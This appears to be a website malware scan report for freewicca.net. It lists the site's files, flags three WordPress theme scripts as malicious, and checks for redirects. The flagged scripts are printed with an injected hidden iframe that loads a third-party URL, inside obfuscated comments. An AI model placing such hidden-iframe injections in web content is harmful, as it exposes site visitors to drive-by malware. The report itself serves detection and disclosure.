Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=freewicca.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://freewicca.net/ | 200 OK Content-Length: 10440 Content-Type: text/html | clean |
http://freewicca.net/wp-includes/js/prototype.js?ver=1.5.0-0 | 200 OK Content-Length: 71260 Content-Type: application/javascript | clean |
http://freewicca.net/wp-includes/js/scriptaculous/wp-scriptaculous.js?ver=1.7.0 | 200 OK Content-Length: 1727 Content-Type: text/html | clean |
http://freewicca.net/wp-includes/js/scriptaculous/'+libraryName+' | 404 Not Found Content-Length: 312 Content-Type: text/html | clean |
http://freewicca.net/test404page.js | 404 Not Found Content-Length: 7295 Content-Type: text/html | clean |
http://freewicca.net/wp-includes/js/scriptaculous/effects.js?ver=1.7.0 | 200 OK Content-Length: 37872 Content-Type: text/html | clean |
http://freewicca.net/wp-content/themes/k2/js/k2functions.js.php?ver=223 | 200 OK Content-Length: 3365 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function OnLoadUtils() { $("comment-personaldetails").style.display = "none"; $("showinfo").style.display = ""; $("hideinfo").style.display = "none"; } function ShowUtils() { new Effect.BlindDown('comment-personaldetails', {duration: 0.3}); new Effect.Appear('comment-personaldetails', {duration: 0.3}); $("showinfo").style.display = "none"; $("hideinfo").style.display = ""; } function HideUtils() { new Effect.Fade('comment-personaldetails', } }, 10); } if (document.addEventListener) { document.addEventListener('DOMContentLoaded', FastInit.onload, false); FastInit.legacy = false; } Event.observe(window, 'load', FastInit.onload); <!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><div style="display:none"><iframe src="http://sites-counter.com/users/189/in.php" width="72" height="405">Text here...</iframe></div><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 --> Antivirus reports:
| ||
http://freewicca.net/wp-includes/js/scriptaculous/slider.js?ver=1.7.0 | 200 OK Content-Length: 10403 Content-Type: text/html | clean |
http://freewicca.net/wp-content/themes/k2/js/trimmer.js.php?ver=247 | 200 OK Content-Length: 3586 Content-Type: text/javascript | clean |
http://freewicca.net/wp-content/themes/k2/js/rollingarchives.js.php?ver=224 | 200 OK Content-Length: 5606 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var RollingArchives = {}; RollingArchives = Class.create(); RollingArchives.prototype = { initialize: function(attachitem, targetitem, url, pagetext) { this.attachitem = attachitem; this.targetitem = targetitem; this.url = url; this.pagetext = pagetext; this.rollnext = 'rollnext'; this.rollprev = 'rollprevious'; this.rollpages = 'rollpages'; this.rollload = 'rollload'; this.rollhome = 'rollhome'; this.rolldates = 'rolldates } this.rollingState = null; this.trimmer.restoreState(); } }, saveCookie: function() { setCookie('k2RollingQuery', this.query.toQueryString()); } }<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><div style="display:none"><iframe src="http://sites-counter.com/users/189/in.php" width="72" height="405">Text here...</iframe></div><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 --> Antivirus reports:
| ||
http://freewicca.net/wp-content/themes/k2/js/livesearch.js.php?ver=262 | 200 OK Content-Length: 3818 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Livesearch = Class.create(); Livesearch.prototype = { initialize: function(searchform, targetitem, hideitem, url, searchprompt, buttonvalue) { this.searchform = searchform; this.targetitem = targetitem; this.hideitem = hideitem; this.url = url; this.searchprompt = searchprompt; this.buttonvalue = buttonvalue; this.searchfield = 's'; this.loaditem = 'searchload'; this.resetbutton = 'searchreset'; this.submitbutton = 'searchsubmi if ( $(this.hideitem) ) { $(this.targetitem).hide(); $(this.hideitem).show(); $(this.targetitem).update(); } else if ( K2.RollingArchives ) { K2.RollingArchives.restoreRollingState(); } } } <!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><div style="display:none"><iframe src="http://sites-counter.com/users/189/in.php" width="72" height="405">Text here...</iframe></div><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 --> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: freewicca.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 04:08:29 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://freewicca.net/xmlrpc.php
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: freewicca.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 04:08:29 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://freewicca.net/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: freewicca.net
Referer: http://www.google.com/search?q=freewicca.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: freewicca.net
Referer: http://www.google.com/search?q=freewicca.net
Result:
The result is similar to the first query. There are no suspicious redirects found.